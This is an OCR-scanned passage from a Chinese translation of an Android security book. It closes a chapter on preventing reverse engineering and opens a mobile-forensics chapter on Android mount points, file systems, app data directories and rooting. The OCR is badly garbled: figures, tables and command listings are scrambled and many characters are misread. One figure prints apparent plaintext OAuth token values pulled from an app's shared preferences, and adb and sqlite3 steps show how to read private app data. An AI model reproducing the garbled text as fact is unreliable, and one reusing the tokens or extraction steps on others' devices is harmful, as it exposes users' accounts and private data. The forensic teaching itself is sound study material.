程序 能 够 以 加 密 的 方式 存储 数据 。 例 如 ， 用 户 的 联系 人 信息 经 过 加 密 处 理 ， 存 储 在 
SQLite3 数据 库 。@) 使 用 磁盘 加 密 ， 所 有 的 数据 在 飞速 写 人 磁盘 的 过 程 中 被 加 密 / 解 
密 。 对 于 系统 管理 员 来 说 ， 更 倾向 于 使 用 全 盘 加 密 ， 这 样 就 不 需要 依赖 开发 者 在 他 
们 的 应 用 程序 中 实现 加 密 功 能 。 


7.6.6 结论 


访问 控制 (依靠 操作 系统 防止 对 关键 文件 的 访问 ) 、 加 密 技 术 (依靠 加 密 以 及 
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散 列 计算 保护 机 密 数 据 ， 如 令 牌 值 ， 并 验证 应 用 程序 的 完整 性 ) 和 代码 混淆 ( 增 
加 类 文件 的 解密 难度 ) 是 程序 开发 人 员 可 以 利用 的 防止 应 用 程序 被 逆向 工程 的 主 
要 策略 。 在 Google Wallet 应 用 程序 漏洞 和 Skype 的 问题 中 ， 如 果 开 发 人 员 和 系统 管 
理 员 使 用 恰当 的 访问 控制 和 加 密 技 术 ， 这 些 报 出 的 安全 漏洞 和 问题 都 可 以 被 防止 。 





7.7 小 结 


本 章 讨 论 了 一 种 可 能 的 情况 ， 即 无 需 源 码 反 汇编 和 重新 汇编 Android 应 用 程 
序 ， 然 后 使 用 作者 编写 的 示例 应 用 程序 “SecureApp”， 演 示 了 Android 应 用 程序 反 
汇编 和 重新 汇编 的 过 程 。 本 章 介 绍 了 几 种 最 优 的 安全 策略 ， 防 止 应 用 程序 被 道 向 工 
程 ， 以 及 减少 由 道 向 工程 可 能 造成 的 信息 泄露 问题 。 读 者 应 当 试 着 自己 开发 一 款 
Android 应 用 程序 (或 者 从 本 书 的 网 站 www. androidinsecurity. com 下 载 作 者 编写 的 
Android 应 用 程序 “SecureApp”) ， 验 证 本 章 列举 的 各 种 技术 。 





第 8 童 入 侵 Android 


本 章 将 介绍 什么 是 移动 设备 取证 和 移动 设备 取证 技术 ， 引 导读 者 了 解 Android 
文件 系统 、 目 录 ， 以 及 挂 载 点 的 概念 。 本 章 还 将 介绍 如 何 对 SD 卡 进 行 分 析 ， 以 及 
Android 系统 特有 的 取证 技术 。 最 后 将 通过 一 个 示例 ， 对 本 章 介 绍 的 各 个 专题 进行 
演示 。 


8.1 概述 


作为 数字 取证 技术 的 分 支 ， 移 动 设 备 取证 技术 主要 用 在 法 庭 取证 条 件 下 ， 从 移 
动 设备 上 恢复 数字 证 据 或 数据 信息 9 。 

正如 在 第 1 章 的 讨论 ， 如 今 移动 设备 的 功能 非常 的 强大 ， 可 用 来 处 理 各 种 通 
信 、 交 易 ， 以 及 其 他 任务 。 在 一 部 智能 电话 上 ， 往 往 会 存储 着 各 种 各 样 的 个 人 信 
息 ， 包 括 联 系 人 信息 、 照 片 、 日 程 安排 、 记 事 本 、SMS 信息 、MMS 信息 、 电 子 邮 
件 、 浏 览 器 历史 、GPS 位 置信 息 、 社 交 媒 体 信息 、 金 融 数据 、 密 码 ， 等 等 。 如 果 手 
边 有 一 部 移动 设备 ， 不 论 它 是 来 自 合 法 调查 活动 中 的 证 物 ， 还 是 出 于 安全 调查 目的 
而 需要 被 分 析 的 设备 ， 只 要 人 们 懂得 如 何 提取 信息 的 技术 ， 就 可 从 该 移动 设备 中 获 
取 大 量 的 信息 。 本 章 所 关注 的 内 容 ， 是 如 何 尽 可 能 多 地 从 移动 设备 上 提取 信息 ， 而 
不 仅仅 限于 在 法 庭 取证 的 条 件 下 。 至 于 在 法 庭 取证 的 条 件 下 ， 如 何 正确 地 实施 移动 
设备 的 取证 ， 则 不 属于 本 书 所 讨论 的 范围 。 

在 Android 设备 上 取证 ， 最 重要 的 是 对 Android 系统 的 理解 。 前 面 章 节 已 经 讨论 
T Android 系统 的 体系 结构 和 安全 模型 。 本 章 将 进一步 讨论 Android 文件 系统 的 细节 , 
包括 目录 、 文 件 、 挂 载 点 ， 以 及 文件 系统 。 读 者 需要 了 解 如 何 存 储 、 在 哪里 存储 ， 以 
及 哪 种 类 型 的 数据 存储 在 设备 上 。 之 后 ， 才 能 够 实际 地 提取 有 用 的 信息 。 数 据 能 够 以 
应 用 程序 /系统 特定 的 文件 格式 或 SQLite 数据 库 文 件 的 形式 ， 在 文件 系统 上 存储 。 



































8.2 Android 文件 系统 


本 章 将 通过 分 析 Android 设备 上 的 各 种 挂 载 点 ， 介 绍 Android 的 文件 系统 ， 以 
及 它 的 目录 结构 ， 这 将 有 助 于 读者 了 解 并 掌握 Android 文件 系统 相关 的 有 用 信息 。 








日 ”移动 设备 取证 ; 参考 维基 百科 http: //en. wikipedia. org/wiki/Mobile, device. forensics ; 原 书 注 
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典型 Android 设备 的 挂 载 点 如 图 8. 1 所 示 。 


ro,relatime 0 0 
s rwn 


devpts rw,relatime,mode-600 0 0 


me,mode-755,gid«1000 0 0 


'asec tmpfs rw,rela 
latime,mode-755,gid-1000 0 0 


obb tmpfs 
none /dev/cpuctl cgroup rw, 
mtdblock4 /c 


latime,cpu 9 0 
rw, nosuid, nodev, re 
nosuid, nodev 
ne/system /sy: 
serdata 


dhci .Q/by-name. 
rnel/debug debi 
sdcard vfat 


time ð 0 
nc, nosuid, nodev, noexec 


lebug / 
ock/vold, 

nt-ro 0 0 

/ dev/block/vold, 

remount-ro 0 0 

tmpfs /mnt/sdcard/.android secure tmpfs ro,relatime,size-0k,mode-000 0 0 

5 


mr „dir: 


/mnt/secure/asec vfat rw, 


图 8.1 





8.2.1 ERA 





ro,relatime,barrier-i,dat 
a ext4 rw,nosuid,nodev, noatime bx 


C, nosuid,nodev, noexec, relatime, uid=1900, gid=1015, f 


Android 设备 上 的 挂 载 点 


首先 来 看 一 下 Android 设备 上 的 各 种 分 区 ， 以 及 与 其 相关 的 文件 目录 结构 ， 如 





图 8. 2 所 示 ， 输 入 并 执行 “adb shell mount". 命令 ， 显 示 设 备 上 


=] 
- 








挂 载 的 文件 系统 。 





然后 ， 再 输入 并 执行 “adb shell cat/proc/filesystems" 命令 ， 显 示 系 统 支 持 的 文件 系 





统 类 型 列表 ， 如 图 8.3 所 示 。 表 8. 1 给 出 了 Android 设备 上 的 各 种 分 区 信息 


List of devices attached 
393402D32A9900EC device 


anmmisra-mac:- Anmol$ adb shell 


radio 
root 
cache 


1969-12-31 
1969-12-31 
1969-12-31 
2012-09-04 
1969-12-31 
1969-12-31 
1969-12-31 
1969-12-31 
1969-12-31 
1969-12-31 
1969-12-31 
2012-04-07 
2010-12-16 2 


system 
root 
root 


图 8.2 Android 设备 的 文件 














该 目录 结构 是 使 用 adb 工具 查看 与 用 





© 











T 





及 其 说 明 。 


efs 

config 

cache 

sdcard -> /mnt/sdcard 
acct 

mn 七 

vendor -> /system/vendor 
d -» /sys/kernel/debug 
etc -> /systen/etc 
ueventd, rc 
Ueventd.herring.rc 
ueventd.goldfish.rc 
system 

sys 

sbin 

proc 

init.rc 
init.herring.rc 
init.goldfish.rc 

init 

default.prop 

data 

root 

dev 


目录 结构 人 〇 





户 工作 电脑 相连 接 的 Android 设备 的 文件 系统 目录 结构 。 一 一 译 者 注 
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$ cat /proc/filesystems 
sysfs 


rootfs 

bdev 

proc 

cgroup 
tmpfs 
binfmt misc 
debugfs 
sockfs 
pipefs 
anon. inodefs 
devpts 





图 8.3 Android 设备 文件 系统 类 型 











表 8.1 Android 设备 已 挂 载 的 文件 系统 简介 
挂 载 点 说 明 
只 读 模式 的 根 文 件 系统 ， 由 内 核 在 其 他 文件 系统 挂 载 之 前 挂 载 ， 包 含 重要 的 系统 
信息 ， 如 内 核 启动 时 所 需 的 引导 配置 和 各 种 支持 库 等 
包含 系统 支持 库 、 可 执行 文件 、 字 体 、 系 统 应 用 程序 ， 以 及 各 种 配置 文件 等 ， 该 
/system 目录 在 文件 系统 上 的 权限 为 只 读 ， 在 该 目录 中 的 子 文件 夹 有 ban, lib, ete, bin, 


人 


app, media 和 fonts 等 













































































































































































m 包含 各 种 临时 文件 ， 例 如 浏览 器 缓存 和 下 载 的 文件 ， 以 及 系统 骨 溃 后 执行 系统 修 
复 产生 的 各 种 恢复 文件 等 。 在 文件 系统 中 ， 该 文件 夹 对 外 提供 可 读 写 权限 
pM 包含 用 户 数据 和 应 用 程序 数据 ， 其 中 包括 用 户 安 装 的 应 用 程序 、 程 序 设 置 和 配置 
参数 文件 (shared preference) 等 
/mnt/sdcard 该 分 区 指向 SD 卡 ， 其 文件 系统 类 型 为 FAT32 ， 且 具有 可 读 写 权限 
/ mnt/secure/ asec 立 于 SD 卡 内 ， 供 安装 在 SD 卡 上 的 应 用 程序 存储 经 过 加 密 处 理 的 文件 





























8.2.2 文件 系统 


Android 操作 系统 基于 Linux 内 核 ， 因 此 可 以 支持 很 多 的 文件 系统 。 使 用 adb 
工具 在 相连 的 设备 上 开启 的 shell 程序 中 ， 以 命令 行 的 方式 输入 并 执行 “cat/procv 
filesystems” 命 令 ， 可 以 获得 Android 系统 支持 的 文件 系统 列表 。 如 图 8.3 所 示 ， 文 
件 系统 旁边 的 nodev 表示 没有 实际 的 物理 设备 与 该 文件 系统 关联 ， 因 此 系统 使 用 
nodev 作为 虚拟 的 文件 系统 。 需 要 注意 的 是 ，Android 系统 支持 ext2, ext3 和 ext4 X 
件 系统 ， 这 些 文件 系统 通常 用 在 Linux 操作 系统 。 同 时 ，Android 系统 还 支持 vfat X 
件 系 统 ， 该 文件 系统 通常 被 用 在 基于 Windows 的 操作 系统 上 。 此 外 ， 由 于 Android 
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系统 是 针对 移动 设备 设计 的 ， 因 此 ，Android 系统 还 支持 YAFFSC 和 YAFFS2 文件 
系统 (当然 ， 要 想 支 持 YAFFS 和 YAFFS2 文件 系统 ，Android 设备 还 需要 具有 支持 
NAND 的 芯片 才 可 以 ) 。 上 述 文件 系统 的 详细 信息 见 表 8. 2。 
表 8.2 Android 系统 的 各 种 文件 系统 
文件 系统 说 明 
许多 移动 设备 都 会 使 用 YAFFS 和 YAFFS2 文件 系统 ， 它 们 是 专门 针对 NAND 或 
NOR 闪存 而 设计 的 快速 旦 强大 的 文件 系统 ， 专 用 于 骨 入 式 设备 。 其 中 ，YAFFS2 是 较 
YAFFS 和 YAFFS2 | 新 的 文件 系统 版 本 ，YAFFSI1 支持 以 512B 作为 每 个 page 大 小 的 闪存 ， 而 YAFFS2 Jl 
可 以 支持 以 2KB 作为 每 个 page 大 小 的 闪存 。 也 就 是 说 ，YAFFS2 可 以 支持 大 容量 的 
闪存 。 更 多 有 关 这 两 种 文件 系统 的 信息 请 参考 http: //www. yaffs. net/ 



























































通常 Linux 内 核 使 用 这 些 文件 系统 ， 即 ext2 、ext3 和 ext4 (第 二 代 、 第 三 代 和 第 
代 扩 展 文件 系统 ) 。ext2 文件 系统 是 20 世纪 90 年 代 早 期 推出 的 ， 用 于 解决 Linux 内 
核 使 用 的 exi 文件 系统 中 存在 的 一 些 问题 。ext3 文件 系统 在 ext2 文件 系统 中 增添 了 日 
志 功 能 ， 以 及 一 些 其 他 的 新 特性 。ext4 文件 系统 在 exo. 文件 系统 中 进一步 添加 了 新 
的 功能 ， 包 括 对 超大 文件 系统 和 超大 文件 的 支持 ， 引 入 extent 的 文件 存储 方式 (取代 
了 ext2 ext3 中 使 用 的 block mapping 文件 存储 方式 ) ， 以 及 一 些 其 他 的 功能 
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ext2 ext3 和 ext4 









































vfat 也 就 是 微软 公司 开发 的 FAT32 文件 系统 。 在 Linux 内 核 中 ，FAT32 文件 系统 的 
实现 即 称 为 vfat 文件 系统 。 该 文件 系统 主要 用 在 Android 系统 的 SD RE 











8.2.3 目录 结构 


首先 来 看 一 下 典型 Android 设备 的 目录 结构 。 读 者 可 以 通过 adb 工具 在 相连 设 
备 上 启动 的 shell 程序 ， 以 命令 行 的 方式 访问 Android 设备 的 文件 系统 ， 也 可 以 通过 
Eclipse 软件 的 DDMS T.H. (如 图 8.4 所 示 ) 访问 Android 设备 的 文件 系统 。 在 这 里 
需要 注意 的 主要 是 三 个 目录 ， 即 /system 、/sdcard 和 /data。 前 面 介绍 过 ，/system H 
录用 于 存放 和 操作 系统 相关 的 大 部 分 文件 ， 包 括 系统 应 用 程序 、 支 持 库 、 字 体 文 
件 、 可 执行 文件 ， 等 等 。/sdcard 目录 是 一 个 映射 到 /mnt/sdcard 目录 的 软 链接 ， 指 
向 设备 上 的 SD Fo /data 目录 用 于 存放 用 户 数据 。 具 体 来 说 ， 每 一 个 应 用 程序 都 
有 一 个 “/data/app/ < 应 用 程序 名 称 > ”目录 与 之 关联 ， 应 用 程序 用 户 数据 存放 在 
与 其 关联 的 “/data/data/ < 应 用 程序 名 称 > ”目录 中 。 对 于 移动 设备 来 说 ， 用 户 无 
法 访问 /data 目录 ， 因 为 该 目录 只 对 Android 系统 用 户 可 读 ， 而 用 户 作为 shell JH P! 
(用 户 通过 adb 工具 在 相连 接 设 备 上 启动 的 shell 程序 ， 只 能 赋予 用 户 shell 用 户 的 








YAFFS (Yet Another Flash File System) 是 一 个 专门 为 NAND Flash 存储 器 设计 的 般 入 式 文件 系统 ， 适 
用 于 大 容量 的 存储 设备 ， 并 且 是 在 GPL (General Public License) 协议 下 发 布 的 ， 可 在 其 网 站 免费 获 
得 源 代码 ， 在 YAFFS 中 ， 最 小 存储 单位 为 一 个 Page， 文 件 内 的 数据 是 存储 在 固定 512B 的 Page 
" 译 者 注 
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文件 系统 访问 权限 ) 没有 对 该 目录 的 访问 权限 。 本 章 通 过 模拟 器 来 展示 /data 目录 
的 内 容 。 由 于 应 用 程序 将 用 户 数 据 存 放 在 与 其 关联 的 “/data/data/ < 应 用 程序 名 
称 >” 目 录 下 ， 所 以 保证 只 有 该 应 用 程序 才能 访问 与 其 关联 的 特定 文件 目录 ， 对 
于 确保 应 用 程序 信息 数据 安全 是 非常 重要 的 。 这 种 访问 控制 机 制 主 要 通过 用 户 权 限 
来 实现 ， 也 就 是 说 每 个 应 用 程序 都 有 自己 的 UID ， 并 且 只 有 具有 该 UID 或 只 有 该 用 
户 才 有 权限 访问 与 其 相关 联 的 文件 目录 。 表 8. 3 给 出 了 Android 系统 上 应 用 程序 可 
能 需要 访问 的 几 个 重要 的 文件 /目录 的 简介 。 本 章 将 在 后 面 介绍 /data/data 文件 夹 
的 结构 。 























Moss EN 3 38 € a six 
In - Name ——— ee 1 Size Date Time Permissions inf 
这 | Sda 2012-04-07 20:30 drwxrwx--x 
Y emnt 2012-09-04 18:14 drwxrwxr-x 
Saec 2012-09-04 18:14 drwxr-xr-x 
Gy obb 2012-09-04 18:14 drwxr-xr-x 
> G9 sdcard 1969-12-31 16:00 d---rwxr-x 
© secure 2012-09-04 18:14 drwx------ 
YE system. 1969-12-31 16:00 drwxr-xr-x 
> app 2010-12-17 09:32 drwxr-xr-x 
> Gs bin 2010-12-17 09:32 drwxr-xr-x 
i8 build.prop 1984 2010-12-17 09:32 -rw-r--r-- 
P Bete 2010-12-17 09:32 drwxr-xr-x 
> © fonts 2010-12-17 09:32 drwxr-xr-x 
> © framework 2010-12-17 09:32 drwxr-xr-x 
> C» lib 2010-12-17 09:32 drwxr-xr-x 
> © media 2010-12-17 09:32 drwxr-xr-x 
b (9 modules 2010-12-17 09:32 drwxr-xr-x 
b (tts 2010-12-17 09:32 drwxr-xr-x 
b ousr 2010-12-17 09:32 drwxr-xr-x 
> 2» vendor 2010-12-17 09:32 drwxr-xr-x 
P xbin 2010-12-17 09:32 drwxr-xr-x 
I 





























图 8.4 Android 设备 目录 结构 (通过 Eclipse 上 的 DDMS 工具 查看 ) 


表 8.3 Android 系统 上 重要 的 文件 /目录 



































目录 /文件 说 明 

/ cache 存放 临时 信息 ， 如 浏览 器 缓存 、 功 能 设置 或 恢复 的 文件 等 
/sdcard 用 于 应 用 程序 存放 数据 ， 如 音乐 文件 、 下 载 的 文件 、 照 片 等 
/ vendor 专用 于 设备 制造 厂商 (如 三 星 、HTC 等 ) 存放 文件 的 目录 








Android 系统 目录 ， 包 含 各 种 系统 配置 文件 、 二 进 制 程序 文件 、 系 统 
应 用 程序 ， 等 等 


/system/etc/ permissions/platform. xml | ”将 底层 用 户 ID/ 群 组 ID. 的 权限 同系 统 使 用 的 权限 名 称 进行 映射 


/ system 












































































































































/system/ app 预 装 在 设备 上 的 系统 应 用 程序 
/ system/ bin 二 进 制 的 可 执行 文件 ， 例 如 ls、mount 等 
/system/ buid. prop 设备 特有 的 具体 配置 和 信息 
/data/ data 用 于 已 安装 的 应 用 程序 存放 用 户 数据 
/data/ app 用 户 安装 的 应 用 程序 
/ data/ app- private 用 户 安装 的 应 用 程序 (通常 是 一 些 付费 的 应 用 程序 ) 
/mnt/asec 用 于 存储 安装 在 SD 卡 上 的 应 用 程序 的 相关 文件 
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8.3 Android 应 用 程序 数据 

本 节 将 介绍 应 用 程序 保存 持久 化 数据 的 方法 ， 查 看 /data/data 文件 夹 的 内 容 ， 
以 及 如 何 从 该 目录 内 获取 有 用 信息 。 
8.3.1 存储 方式 


Android 系统 提供 多 种 存储 方式 供应 用 程序 根据 自身 需求 保存 持久 化 数据 。 
表 8.4 提供 了 各 种 可 供 选择 的 数据 存储 方式 。 


表 8.4 Android 应 用 程序 存储 方式 简介 



















































































































































































存储 方式 说 明 
将 私有 数据 以 键 值 对 的 形式 存储 ， 主 要 用 于 存储 原型 数据 ， 如 boolean, float, int, 
共享 参数 配置 文件 
TO hiy string 等 类 型 的 数据 
在 内 部 存储 器 上 存储 私有 数据 ， 应 用 程序 能 直接 将 文件 存储 在 内 部 存储 器 上 (与 
内 部 存储 器 相对 的 是 外 部 存储 器 ， 如 SD 卡 等 ) ， 存 储 的 文件 受到 文件 权限 的 保护 ， 
内 部 存储 应 用 程序 是 其 创建 的 文件 的 所 有 者 。 需 要 注意 的 是 ， 如 果 应 用 程序 要 想 使 其 创建 的 
iid 文件 只 对 它 自己 开放 操作 权限 ， 则 应 当 使 用 MODE_PRIVATE 选项 创建 文件 。 和 否则 ， 
如 果 使 用 MODE_WORLD_READABLE 或 MODE_WORLD_WRITABLE 选项 创建 文件 ， 
将 对 其 他 所 有 的 应 用 程序 开放 读 写 操作 权限 
外 部 存储 将 数据 存储 在 共享 的 外 部 存储 设备 上 。 在 外 部 存储 设备 上 存储 的 文件 对 所 有 的 应 
E 用 程序 开放 读 写 操作 权限 ， 并 且 文 件数 据 不 受 基 于 权限 的 安全 访问 机 制 保护 
SQLite 数据 库 将 数据 存储 在 私有 数据 库 中 ， 数 据 存 取 的 权限 只 对 该 数据 所 属 的 应 用 程序 开放 
网 络 连接 将 数据 存储 在 网 络 服务 器 上 














8.3.2 /data /data 


前 面 已 经 介绍 了 应 用 程序 可 选 的 数据 存储 方式 ， 接 下 来 通过 一 些 真 实 的 应 用 程 
序 ,， 分 析 它 们 的 /data/data/ 上 日 录 。 安 装 Seesmic 应 用 程序 ， 该 应 用 程序 可 以 使 用 户 
能 够 管理 并 登录 多 个 社交 网 站 账号 。 图 8.5 展示 的 是 /data/data 目录 下 的 子 目 
录 /data/ data/com. seesmic ， 也 就 是 Seesmic 应 用 程序 关联 的 目录 。 该 应 用 程序 的 目 
录 下 包含 了 三 个 文件 夹 ， databases lib 和 shared. prefs;. 35:388 H1 P? 2X, shell 用 户 无 法 
访问 设备 上 的 /data/data 目录 ， 因 为 该 目录 的 访问 权限 只 对 系统 拥有 者 (也 就 是 系 
统 用 户 system) 开放 。 读 者 可 对 移动 设备 进行 root 处 理 ， 然 后 再 访问 该 目录 。 也 可 
以 将 Android 文件 系统 制作 成 镜像 文件 ， 然 后 再 读 取 该 镜像 文件 中 /data/data 目录 
的 内 容 。 

从 这 个 文件 夹 的 结构 可 见 ， 应 用 程序 可 以 将 数据 存储 在 SQLite 数据 库 中 ， 也 
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# cd /data/data/com. se* 
# pwd 

/data/data/com. seesmic 
# ls -l 


drwxrwx--x app.40 ”app_40 E us databases 
drwxrwx--x app.40 — app.40 -= 4 shared prefs 
drwxr-xr-x system system 

# | 








图 8.5 /data/data 目录 内 Seesmic 应 用 程序 的 目录 





可 存储 在 共享 配置 文件 ( 即 shared preference XML 文件 ) 中 。 接 下 来 研究 一 下 这 些 
文件 ,看 看 是 否 能 够 获得 更 多 有 用 的 信息 。 浏 览 shared_prefs 目录 内 容 ， 使 用 
"cat" 命令 查 看 其 中 任 一 XML 文件 的 内 容 ， 从 中 可 以 得 到 应 用 程序 中 使 用 的 一 些 
信息 (这 些 信息 以 键 值 对 的 形式 体现 在 XML 文件 中 ) 。 从 图 8.6 可 见 ， 在 该 XML 
文件 内 部 定义 的 各 种 键 值 对 中 ， 有 一 个 名 为 “req_token_secret” 的 键 值 对 ， 还 有 一 





























个 名 为 “req_token” 的 键 值 对 。 如 果 应 用 程序 的 开发 者 不 人 够 细心 ， 
存储 各 种 敏感 信息 (甚至 包括 明文 形式 的 密码 ) 。 


KM cd shared prefs* 
# is -1 
-rw-rw---- app.40 app.40 1201 2012-09-05 06:24 com.seesmic preferences .xml 
l-rw-rw---- app.40 app.40 126 2012-09-05 06:24 has set default values.xml 
# cat _has* 
?xml version-'1.0' encoding-'utf-8' standalone-'yes' ?> 
<map> 
«boolean name=" has set default values" value="true" /> 
map» 
dicc com.see* 
?xml versions'1.0' encodings'utf-8' standalones'yes' ?» 
«map 


string names"refresh time"»1800«/string» 

cboolean name-"show avatars" value="true" /> 
string names"reqg token"»SzUuExuSHEVGKcYKMYL 72hHxyP JbKeOcOmQqz8TIKKs«/string» 
string names"font size"»14«/string» 

«boolean name-"first run" value="false" /> 

«boolean names"hd avatars" value="true" /> 

string name-"clear on install"»v5«/string» 
«boolean names"bkg updates" values"true" /» 
«boolean name-"replies notif" value="true" /> 
«string names"photo"»http://twitter.com/«/string» 
string names"view user"»profile«/string» 

string name-"nb tweets"»5Q«/string» 

<string names"shorturl"»http://api .bit.ly/«/string» 
«boolean name-"remember pos" value-"true" /> 
«boolean names"autoscroll messages" value="true" /> 
string name-"req. token, secret "»Tgv3wAxuINwNhwzOgIuVpE12W3HvKOUFAVwWSGy4 jtJ4«/ string» 
string names"photo. quality"»1024«/string» 

«boolean names"led key" value="true" /> 

string names"quote style"»RT«/string» 

boolean names"vibrate" value="true" /> 

«boolean names"dm notif" value="true" /> 

«boolean name-"preview pics" value="true" /> 
boolean name-"bkg notifications" value="true" /> 
string names"video"»http://yfrog.com/«/string» 


图 8.6 shared prefs 文件 夹 内 任 一 XML 文件 的 内 容 


从 图 8.5 中 还 可 以 看 到 ， 在 /data/data/com. seesmic 目录 内 还 包 
文件 夹 。 打 开 该 文件 夹 可 以 看 到 一 个 名 为 twitter. db 的 数据 库 文件 ， 














就 可 能 在 这 里 


含 一 个 数据 库 
说 明 设备 用 户 








拥有 一 个 twitter 账号 。 接 下 来 再 来 看 一 下 是 否 能 够 从 twitter. db 数据 库 文件 中 ， 得 
到 更 多 的 关于 该 twitter 账号 的 信息 。 可 以 使 用 SQLite3 命令 行 工 具 来 进行 这 项 工 
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作 。 沪 数据 库 文件 内 容 如 图 8:7 Bom, 从 中 可 以 了 解 到 该 数据 库 的 结构 。 然 后 ， 就 
可 以 通过 查询 数据 库 中 的 数据 表 ， 获 取信 息 。 


# pud 
/data/data/com. seesmi c/databases 
# is -i 
-rw-rw---- app.40 opp_49 62464 2012-09-05 06:24 twitter.db 
# sqlite3 twitter.db 
SQLite version 3.6.22 
Enter ".help" for instructions 
Enter SQL statements terminated with a 
sqlite> .schema 
CREATE TABLE accounts (Lid TEXT PRIMARY KEY name TEXT, password TEXI,fullname TEXT, avatar url TEXT,main INTEGER,added index INTEGER, rest api TEXT, 
5 INTEGER,mentions.y ÍNTEGER,token INTEGER,secret INTEGER,type INTEGER, UNIQUE ( id, rest api); 
TABLE android metadata (locale TEXT); 
E TABLE attachs (Lid INTEGER PRIMARY KEY,name TEXT,path TEXT,size INTEGER,media. id INTEGER,url TEXT,type INTEGER ); 
TABLE authors (id INTEGER PRIMARY KEY, een name TEXT, fuil nome TEXT avatar url TEXT, protected INTEGER); 
TABLE dm Cid INTEGER PRIMARY KEY, my dm id INTEGER, account id INTEGER, sender id INTEGER, recipient id INTEGER, message TEXT, urls FEXT,dm_ senti 
TABLE facebook_authors (id TEXT PRIMARY KEY, fullname TEXY, avatar url TEXT, category TEXT); 
TABLE fi f 5 id INTEGER PRIMARY K£Y,account id TEXT,update id TEXT,feed type INTEGER,owner_id TEXT, UNIQUE (account id, update id 
E TABLE facebook.friendlists (_id TEXT PRIMARY KEY, account id TEXT,name TEXT, checked INTEGER, type INTEGER, UNIQUE (id, account id}); 
TABLE facebook page profiles (id INTEGER PRIMARY KEY, user_id TEXT, account id TEXT, website TEXT, founded TEXT, company overview TEXT, mission 
TEXT subcategory TEXT, description TEXT, starring TEXT, directed by TEXT, plot outline TEXY, release date TEXT, genre TEXT, studio TEXT,bio TEXT, 
interests TEXT, likes INTEGER, UNIQUE Cuser.id, account.id)}; 
CREATE TABLE facebook people (id INTEGER PRIMARY KEY, account id TEXT, user_id TEXT, relationship type INTEGER, owner_id TEXT, saved INTEGER, UNIQUE 1 
CREATE TABLE facebook profiles (id INTEGER PRIMARY KEY, user_id TEXT, account id TEXT, about TEXT, birthday TEXT, work TEXT, education TEXT, email TEXT, 
r TEXT political TEXT activities TEXT,music TEXT, books TEXT, movies TEXT, last updated INTEGER, UNIQUE (user id, account id)); 
CREATE TABLE facebook updates (id INTEGER PRIMARY KEY,my update id TEXT, account id TEXT,from id TEXT,to user TEXT, message TEXT, likes..count INTEGH 
linkuri TEXT, link name TEXT, link caption TEXT, link description TEXT,source url TEXT,via TEXT, created_date INTEGER, type INTEGER, privacy TEXT, UNIQ 
CREATE TABLE list info (Lid INTEGER PRIMARY KEY, info list id INTEGER, info status id INTEGER, UNIQUE (Cinfo_\list_id, info status id)); 
CREATE TABLE lists (Cid INTEGER PRIMARY KEY,account id INTEGER, list id INTEGER, list full name TEXT,list_description TEXT,Creator_id INTEGER, lists 
count INTEGER ,member. nt INTEGER, is.followed INTEGER, UNIQUE Caccount id, listid, list type, owner id}); 
CREATE TABLE mute ( id INTEGER PRIMARY KEY, mute title TEXT,mute description TEXT, mute pic uri TEXT, mute type INTEGER , UNIQUE (mut: 
CREATE TABLE search results (id INTEGER PRIMARY KEY,my.tweet id INTEGER, avatar_url TEXT,created time INTEGER,from user TEXT,text TEXT,urls TEXT, 
INTEGER, from. user_id INTEGER, owner query TEXT, UNIQUE (my.tweet id,owner query)); 
CREATE TABLE searches d INTEGER PRIMARY KEY, account id INTEGER, name TEXT,query TEXT,created time INTEGEI 
CREATE TABLE timelines (Cid INTEGER PRIMARY KEY, account id INTEGER, tweet id INTEGER, timeline YNTEGER owner id INTEGER, UNIQUE (account id, tweet i 
CREATE TABLE topics (id INTEGER PRIMARY KEY name TEXT, query TEXT); 
CREATE TABLE tweets INTEGER PRIMARY KEY, my tweet id INTEGER, account id INTEGER, sender id INTEGER, message TEXT,source TEXT, in.reply.to. status. 
|tweet.sent INTEGER, latitude REAL, longitude REAL retweeted by id INTEGER, retweeted by screen name TEXT, retweet count INTEGER,original.id INTEGER, u 
my-tweet id)); 
CREATE TABLE userlists (id INTEGER PRIMARY KEY, account id INTEGER, user. INTEGER iendship INTEGER,owner id INTEGER, userlist saved INTEGER, UNJ 
CREATE TABLE users ( id INTEGER PRIMARY KEY,my user id INTEGER,account id INTEGER, tweets count INTEGER, favorites count INTEGER, friends count INTEG 
1 TEXT,profile.location TEXT,profile description TEXT,is. end INTEGER,is foilower INTEGER,is blocked INTEGER,verified INTEGER, UNIQUE (account i 
E INDEX author.idx ON authors (Cid); 
E INDEX dm idx ON P No ROB 
E INDEX frierdship_idx ON userlists Cfriendship); 
INDEX list idx ON list info (inf 
timeline idx ON timelines (timeline); 
tweet id idx ON search results (my.tweet id); 
tweet idx ON tweets (my twee! 








sqlite» select * from accounts 
sqlite» 





图 8.7 SQLite 数据 库 文件 内 容 


8.4 Android 设备 的 root 处 理 








默认 情况 下 ，Android 设备 只 给 用 户 提供 有 限 的 操作 权限 。 这 些 精心 设计 的 权 
限 约束 用 于 阻止 恶意 软件 〈 以 及 用 户 ) 绕 过 Android 安全 模型 提供 的 安全 控制 机 
制 。 有 时 ， 这 些 权 限 约束 还 用 于 防止 特定 的 功能 被 访问 或 改变 。 例 如 ，TetheringS 





























© Tethering， 指 通过 智能 手机 或 平板 电脑 等 移动 设备 ， 将 它 的 上 网 功能 分 享 给 其 他 设备 使 用 的 功能 ， 它 
利用 移动 设备 ， 如 手机 或 平板 电脑 ， 作 为 无 线路 由 器 ， 或 是 无 线 接 入 点 热点 。 其 他 设备 ， 如 笔记 本 
电脑 或 PDA， 可 以 通过 Wi-Fi 的 无 线 局 域 网 ， 或 是 蓝牙 等 无 线 传 输 ， 或 是 USB 之 类 的 实体 传输 线 ， 
来 与 手机 连接 。 之 后 再 利用 手机 的 2G 或 3G 调制 解 调 器 连接 ， 或 是 无 线 局 域 网 ， 连 接 到 互联 网 ， 
到 分 享 上 网 的 功能 。 许 多 智能 手机 ， 以 软件 的 方式 ， 来 提供 这 个 功能 。 一 一 译 者 
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或 代理 安装 功能 等 。 当 需要 分 析 一 个 设备 时 ， 往 往 需要 获取 该 Android 设备 的 root 
权限 。 通 过 adb 工具 登录 到 相连 设备 的 shell 控制 台 程 序 时 ， 登 录用 户 被 赋予 shell 
用 户 权限 ， 其 UID BIZ. "shell", shell 用 户 实际 上 无 法 访问 一 些 目录 ， 比 如 /data 
目录 ， 因 为 shell 用 户 没有 足够 的 权限 。 因 此 ， 需 要 将 用 户 的 权限 提升 为 超级 用 户 
权限 (也 就 是 root 权限 ) ， 而 实现 这 种 权限 提升 的 处 理 过 程 就 称 为 root。 一 般 情 况 
